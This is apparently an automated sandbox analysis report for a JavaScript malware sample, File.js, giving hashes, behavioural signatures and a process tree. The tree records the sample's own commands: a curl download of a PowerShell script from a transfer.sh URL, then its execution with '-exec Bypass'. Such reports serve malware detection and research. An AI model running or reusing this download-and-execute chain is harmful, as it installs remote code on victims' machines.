Analysis
-
max time kernel
45s -
max time network
50s -
platform
windows7_x64 -
resource
win7-20220901-en -
resource tags
arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system -
submitted
25-11-2022 18:01
Static task
static1
Behavioral task
behavioral1
Sample
File.js
Resource
win7-20220901-en
Behavioral task
behavioral2
Sample
File.js
Resource
win10v2004-20220901-en
General
-
Target
File.js
-
Size
1024KB
-
MD5
e6ec998371e8e87c4fd54fab0753efd6
-
SHA1
78ffb07d87bdc791efdf6621df9a69552dc12a84
-
SHA256
416293a2a049e175d85d418790035732eda8a055071d82d10f36a5bf6d9f246f
-
SHA512
1beb3ac230a17cf5a383660447368744d8ce183edbf5eba27d6b466031cdde96025ea32ad14d8ae6be3f0535a6537e41d3b4ff09fadd6f27aca14e8b94f79bbf
-
SSDEEP
24576:NFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFo:
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 1092 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1092 powershell.exe -
Suspicious use of WriteProcessMemory 18 IoCs
Processes:
wscript.exewscript.execmd.execmd.execmd.exedescription pid process target process PID 1448 wrote to memory of 1932 1448 wscript.exe wscript.exe PID 1448 wrote to memory of 1932 1448 wscript.exe wscript.exe PID 1448 wrote to memory of 1932 1448 wscript.exe wscript.exe PID 1932 wrote to memory of 1132 1932 wscript.exe cmd.exe PID 1932 wrote to memory of 1132 1932 wscript.exe cmd.exe PID 1932 wrote to memory of 1132 1932 wscript.exe cmd.exe PID 1132 wrote to memory of 1152 1132 cmd.exe cmd.exe PID 1132 wrote to memory of 1152 1132 cmd.exe cmd.exe PID 1132 wrote to memory of 1152 1132 cmd.exe cmd.exe PID 1932 wrote to memory of 668 1932 wscript.exe cmd.exe PID 1932 wrote to memory of 668 1932 wscript.exe cmd.exe PID 1932 wrote to memory of 668 1932 wscript.exe cmd.exe PID 668 wrote to memory of 632 668 cmd.exe cmd.exe PID 668 wrote to memory of 632 668 cmd.exe cmd.exe PID 668 wrote to memory of 632 668 cmd.exe cmd.exe PID 632 wrote to memory of 1092 632 cmd.exe powershell.exe PID 632 wrote to memory of 1092 632 cmd.exe powershell.exe PID 632 wrote to memory of 1092 632 cmd.exe powershell.exe
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\File.js1⤵
- Suspicious use of WriteProcessMemory
PID:1448 -
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" "C:\Users\Admin\AppData\Local\Temp\GTA01.vbs"2⤵
- Suspicious use of WriteProcessMemory
PID:1932 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd.exe /c curl https://transfer.sh/get/KUz0uB/GTA.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps13⤵
- Suspicious use of WriteProcessMemory
PID:1132 -
C:\Windows\system32\cmd.execmd.exe /c curl https://transfer.sh/get/KUz0uB/GTA.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps14⤵PID:1152
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd.exe /c powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps13⤵
- Suspicious use of WriteProcessMemory
PID:668 -
C:\Windows\system32\cmd.execmd.exe /c powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps14⤵
- Suspicious use of WriteProcessMemory
PID:632 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps15⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1092
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
111KB
MD5ae6f5f99b79da73f4a5946b99638464c
SHA15dabcaf16267d88916091c8b969fab45e2780a2f
SHA256839956f6240fdb2afed0556347dd1ecd8c375cbf5e8c017073bc87383e41a77d
SHA512139210450bc7b580acb20a3f205ed15bb70ebc8779efbd5db31e8d77f8e37b396606d60ae87a8b8cce63e2a41666e54cec95d9a00f1959b96fa9047cb8624a8b